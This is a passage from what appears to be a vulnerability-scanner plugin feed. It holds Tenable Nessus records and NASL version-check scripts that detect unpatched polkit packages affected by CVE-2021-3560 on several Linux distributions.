value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'polkit-0.113-5.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'polkit-devel-0.113-5.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T16:00:09", "description": "According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - It was 
found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-09-27T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2561)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:polkit", "p-cpe:/a:huawei:euleros:polkit-libs", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2561.NASL", "href": "https://www.tenable.com/plugins/nessus/153699", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153699);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"EulerOS 2.0 SP9 : polkit (EulerOS-SA-2021-2561)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the polkit packages installed, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus 
requests,\n elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged\n local attacker to, for example, create a new local administrator. The highest threat from this\n vulnerability is to data confidentiality and integrity as well as system availability. (CVE-2021-3560)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2561\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0f2a5e55\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:polkit-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(9)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP9\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"polkit-0.116-5.h6.eulerosv2r9\",\n \"polkit-libs-0.116-5.h6.eulerosv2r9\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"9\", reference:pkg)) flag++;\n\nif (flag)\n{\n 
security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"polkit\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-15T15:52:42", "description": "An update of the polkit package has been released.", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "nessus", "title": "Photon OS 4.0: Polkit PHSA-2021-4.0-0037", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:polkit", "cpe:/o:vmware:photonos:4.0"], "id": "PHOTONOS_PHSA-2021-4_0-0037_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/150283", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-4.0-0037. 
The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150283);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Photon OS 4.0: Polkit PHSA-2021-4.0-0037\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the polkit package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-4.0-37.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:vmware:photonos:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:4.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 4\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 4.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'polkit-0.118-2.ph4')) flag++;\nif (rpm_check(release:'PhotonOS-4.0', cpu:'x86_64', reference:'polkit-devel-0.118-2.ph4')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'polkit');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:42", "description": "New polkit packages are available for Slackware 14.2 and -current to fix a security issue.", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "nessus", "title": 
"Slackware 14.2 / current : polkit (SSA:2021-158-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:polkit", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.2"], "id": "SLACKWARE_SSA_2021-158-02.NASL", "href": "https://www.tenable.com/plugins/nessus/150337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2021-158-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150337);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"SSA\", value:\"2021-158-02\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Slackware 14.2 / current : polkit (SSA:2021-158-02)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New polkit packages are available for Slackware 14.2 and -current to\nfix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.342839\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?123a45a7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected polkit package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:polkit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.2\", pkgname:\"polkit\", pkgver:\"0.113\", pkgarch:\"i586\", pkgnum:\"3_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"polkit\", pkgver:\"0.113\", pkgarch:\"x86_64\", pkgnum:\"3_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"polkit\", pkgver:\"0.119\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"polkit\", pkgver:\"0.119\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T14:54:51", "description": "The remote Ubuntu 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by a vulnerability as referenced in the USN-4980-1 advisory. 
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 20.10 / 21.04 : polkit vulnerability (USN-4980-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-polkit-1.0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-dev", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-0", "p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-dev", "p-cpe:/a:canonical:ubuntu_linux:policykit-1"], "id": "UBUNTU_USN-4980-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150164", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4980-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150164);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"USN\", value:\"4980-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 20.10 / 21.04 : polkit vulnerability (USN-4980-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 20.10 / 21.04 host has packages installed that are affected by a vulnerability as\nreferenced in the USN-4980-1 advisory. Note that Nessus has not tested for this issue but has instead relied only on the\napplication's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4980-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3560\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Polkit D-Bus Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/06/03\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-polkit-1.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-agent-1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpolkit-gobject-1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:policykit-1\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! 
preg(pattern:\"^(20\\.04|20\\.10|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 20.10 / 21.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '20.04', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.04', 'pkgname': 'policykit-1', 'pkgver': '0.105-26ubuntu1.1'},\n {'osver': '20.10', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'policykit-1', 'pkgver': '0.105-29ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'gir1.2-polkit-1.0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-agent-1-0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-agent-1-dev', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-gobject-1-0', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libpolkit-gobject-1-dev', 'pkgver': '0.105-30ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'policykit-1', 'pkgver': 
'0.105-30ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gir1.2-polkit-1.0 / libpolkit-agent-1-0 / libpolkit-agent-1-dev / etc');\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-02T15:30:08", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has polkit packages installed that are affected by a vulnerability:\n\n - It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 
(CVE-2021-3560)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-09T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : polkit Vulnerability (NS-SA-2022-0061)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:polkit", "p-cpe:/a:zte:cgsl_main:polkit-debuginfo", "p-cpe:/a:zte:cgsl_main:polkit-debugsource", "p-cpe:/a:zte:cgsl_main:polkit-devel", "p-cpe:/a:zte:cgsl_main:polkit-docs", "p-cpe:/a:zte:cgsl_main:polkit-libs", "p-cpe:/a:zte:cgsl_main:polkit-libs-debuginfo", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2022-0061_POLKIT.NASL", "href": "https://www.tenable.com/plugins/nessus/160784", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2022-0061. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160784);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2021-3560\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : polkit Vulnerability (NS-SA-2022-0061)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart 